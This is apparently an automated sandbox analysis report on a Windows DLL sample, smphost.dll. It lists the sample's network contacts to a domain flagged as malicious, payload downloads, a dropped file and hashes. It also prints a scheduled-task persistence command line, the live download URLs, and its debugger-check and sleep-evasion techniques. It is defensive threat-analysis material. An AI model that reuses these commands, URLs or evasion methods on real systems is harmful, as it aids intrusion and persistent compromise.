Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: manageintel.com

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1

Jump to behavior

Language, Device and Operating System Detection

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9E9658 cpuid

0_2_6E9E9658

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9E99A8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6E9E99A8

Source: C:\Windows\System32\loaddll32.exe

0_2_6E9E8630

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.14.31.158	manageintel.com	Ukraine		21100	ITLDC-NLUA	true
93.93.131.124	the.earth.li	United Kingdom		44684	MYTHICMythicBeastsLtdGB	false

Contacted Domains

Name	IP	Active
manageintel.com	185.14.31.158	true
the.earth.li	93.93.131.124	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://manageintel.com/WUzZRUBQje/Auth.php	true	Avira URL Cloud: malware	unknown
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml	true	Avira URL Cloud: safe	unknown
https://the.earth.li/~sgtatham/putty/latest/w64/putty.exe	false		high
https://the.earth.li/~sgtatham/putty/0.76/w64/putty.exe	false		high
https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml	true	Avira URL Cloud: safe	unknown

AV Detection

Multi AV Scanner detection for submitted file

Source: smphost.dll

Virustotal: Detection: 8%

Perma Link

Antivirus detection for URL or domain

Source: http://manageintel.com/WUzZRUBQje/Auth.php

Avira URL Cloud: Label: malware

Compliance

Uses 32bit PE files

Source: smphost.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE

Source: unknown	HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.3:49837 version: TLS 1.2

Source: smphost.dll

Static PE information: certificate valid

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9EED8A FindFirstFileExW,		0_2_6E9EED8A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6CED8A FindFirstFileExW,		25_2_6F6CED8A

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: the.earth.li
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 185.14.31.158 32710	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 93.93.131.124 187	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: manageintel.com

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49840

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: ITLDC-NLUA ITLDC-NLUA

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/0.76/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cacheConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 93.93.131.124 93.93.131.124

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.3:49835 -> 185.14.31.158:32710

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833

Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp, regsvr32.exe	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/BhJM.xml
Source: loaddll32.exe, loaddll32.exe, 00000000.00000002.665843375.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp, regsvr32.exe	String found in binary or memory: https://manageintel.com/RKyiihqXQiyE/xukYadevoVow/QXms.xml

Source: unknown

DNS traffic detected: queries for: manageintel.com

Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/QXms.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/latest/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/0.76/w64/putty.exe HTTP/1.1Host: the.earth.liCache-Control: no-cacheConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /RKyiihqXQiyE/xukYadevoVow/BhJM.xml HTTP/1.1Host: manageintel.comCache-Control: no-cache

Source: unknown	HTTPS traffic detected: 185.14.31.158:443 -> 192.168.2.3:49831 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.3:49837 version: TLS 1.2

System Summary

Uses 32bit PE files

Source: smphost.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE

One or more processes crash

Source: C:\Windows\SysWOW64\regsvr32.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 2076

Detected potential crypto function

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9F3EB6	0_2_6E9F3EB6
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9E8C90	0_2_6E9E8C90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6D3EB6	25_2_6F6D3EB6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6C8C90	25_2_6F6C8C90

Found potential string decryption / allocating functions

Source: C:\Windows\System32\loaddll32.exe	Code function: String function: 6E9E9960 appears 34 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 6F6C9960 appears 34 times

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\ProgramData\6\5507.ocx E58B9BBB7BCDF3E901453B7B9C9E514FED1E53565E3280353DCCC77CDE26A98E

Source: smphost.dll

Virustotal: Detection: 8%

Source: smphost.dll

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\smphost.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6260 -s 2076
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllInstall	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllRegisterServer	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\smphost.dll,DllUnregisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe -e C:\ProgramData\6\5507.ocx	Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB43.tmp

Jump to behavior

Source: classification engine

Classification label: mal88.troj.evad.winDLL@19/7@5/2

Source: C:\Windows\System32\loaddll32.exe

0_2_6E9E8630

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6260
Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\computer

Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: smphost.dll

Static PE information: certificate valid

Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: smphost.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: smphost.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: smphost.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Registers a DLL

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /i /s C:\Users\user\Desktop\smphost.dll

Persistence and Installation Behavior

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\ProgramData\6\5507.ocx

Jump to dropped file

Drops PE files

Source: C:\Windows\SysWOW64\regsvr32.exe

File created: C:\ProgramData\6\5507.ocx

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\regsvr32.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\system32\schtasks.exe" /Create /SC MINUTE /MO 3 /TN 5507 /TR "%windir%\system32\regsvr32.exe -e C:\ProgramData\6\5507.ocx

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 32710
Source: unknown	Network traffic detected: HTTP traffic on port 32710 -> 49840

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4604	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4604	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4604	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2008	Thread sleep time: -54000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\loaddll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\regsvr32.exe	Last function: Thread delayed

Found large amount of non-executed APIs

Source: C:\Windows\System32\loaddll32.exe	API coverage: 6.8 %
Source: C:\Windows\SysWOW64\regsvr32.exe	API coverage: 6.3 %

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9EED8A FindFirstFileExW,		0_2_6E9EED8A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6CED8A FindFirstFileExW,		25_2_6F6CED8A

Source: C:\Windows\System32\loaddll32.exe	Thread delayed: delay time: 120000			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Thread delayed: delay time: 30000			Jump to behavior

Source: regsvr32.exe, 00000003.00000003.524171226.0000000005247000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.523620825.0000000005151000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.518162902.0000000005151000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.511554101.0000000005051000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: 7qAJTueJV05Xwegg6bMAAApTi10HgfsAbFhzMiq3oTtaEegJyQAAWY/AdTfkf4tG
Source: regsvr32.exe, 00000003.00000003.524171226.0000000005247000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.523620825.0000000005151000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bVf2XmkyVwC+WwEAAI1F4FpWU1dl//91iQ4iqeMuV07UhiCL+IN94AoPhboPAACF

Anti Debugging

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9E9CF7 IsDebuggerPresent,OutputDebugStringW,

0_2_6E9E9CF7

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9EFE17 GetProcessHeap,

0_2_6E9EFE17

Contains functionality to read the PEB

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9E1710 mov eax, dword ptr fs:[00000030h]	0_2_6E9E1710
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9E1490 mov eax, dword ptr fs:[00000030h]	0_2_6E9E1490
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9E83B0 mov eax, dword ptr fs:[00000030h]	0_2_6E9E83B0
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9EC865 mov eax, dword ptr fs:[00000030h]	0_2_6E9EC865
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9EE9B4 mov eax, dword ptr fs:[00000030h]	0_2_6E9EE9B4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6C1710 mov eax, dword ptr fs:[00000030h]	25_2_6F6C1710
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6C1490 mov eax, dword ptr fs:[00000030h]	25_2_6F6C1490
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6C83B0 mov eax, dword ptr fs:[00000030h]	25_2_6F6C83B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6CE9B4 mov eax, dword ptr fs:[00000030h]	25_2_6F6CE9B4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6CC865 mov eax, dword ptr fs:[00000030h]	25_2_6F6CC865

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9E9AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6E9E9AED
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9EC0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E9EC0A3
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E9E9839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E9E9839
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6C9AED SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	25_2_6F6C9AED
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6C9839 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_6F6C9839
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 25_2_6F6CC0A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	25_2_6F6CC0A3

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: the.earth.li
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 185.14.31.158 32710	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 93.93.131.124 187	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Domain query: manageintel.com

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\smphost.dll",#1

Jump to behavior

Language, Device and Operating System Detection

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9E9658 cpuid

0_2_6E9E9658

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E9E99A8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6E9E99A8

Source: C:\Windows\System32\loaddll32.exe

0_2_6E9E8630

ID:	562835
Product:	CloudBasic
Start time:	13:40:54
Start date:	30.01.2022
Sample:	smphost.dll
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	fc484855692f2a7d1eae090086a1eb72
SHA1:	2e9103747750b40835f58d9e57c2ab75eeaf25f6
SHA256:	e58b9bbb7bcdf3e901453b7b9c9e514fed1e53565e3280353dccc77cde26a98e
Filetype:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\6\5507.ocx	PE32 executable (DLL) (console) Intel 80386, for MS Windows	FC484855692F2A7D1EAE090086A1EB72	2E9103747750B40835F58D9E57C2AB75EEAF25F6	E58B9BBB7BCDF3E901453B7B9C9E514FED1E53565E3280353DCCC77CDE26A98E
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_6a6ca821ebbab05224d67cc3f7b1b60df6be9b5_7a325c51_102a2f91\Report.wer	Little-endian UTF-16 Unicode text, with CRLF line terminators	4E69ED442264DFCFC8A976327CCCDB90	40A769A14E0A00CD4C360D2295D2240E04F12439	FA68E07EC0EFF4B1100FA2157DEEB5DEB7F6B9FE7CA5634730CF90C73F7CF8A2
C:\ProgramData\Microsoft\Windows\WER\Temp\WER16CB.tmp.WERInternalMetadata.xml	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators	E96D4D5B95A58E1D9479774C469491FF	559B525E7E8D954FD42066CCC472E34CA3E8CB8B	2759879D390CFED62D7AE335715B83B86338CE8A76F75EF4E3838DCA790D55B3
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1CD7.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	F462CCD4FC842482C025AD2DEFDD8B84	B8C2826A92BA13ED39C25F8B5329C069B518F71D	FE5C9762D8018324451025AAFE54ABC64513D9B98F1ED7D7590AEF2322EE8469
C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB43.tmp.dmp	Mini DuMP crash report, 14 streams, Sun Jan 30 21:43:59 2022, 0x1205a4 type	7E44EF0D1F00994D03F0D1FCAC053260	6204423E1FA898C99B8BA1977A07729C098951FB	0E2A562AF7240D2F9825F169FDC460AA993F8A556EAF0BC642CDA60847D7DA2C
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	9FC5B772E8FD54476EAAFE05A8F2948F	4F087C7392CC2676356F5BD673AAB2F96C9E17E6	AB2252D7CD408FC90D4F0274677CA89E152A5EED46731F6382C8AF9C7ACEAE0A
C:\Windows\appcompat\Programs\Amcache.hve.LOG1	MS Windows registry file, NT/2000 or above	AE96E48BB239AB3639D949B90C8376DD	C5660A1E7A23EE15129361A18B966CBAEF839387	8D7B697697A17AF4AA18F07891B667CA0BEFACB1B79422A0E94C77992DD9B21E

Windows Analysis Report smphost.dll

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

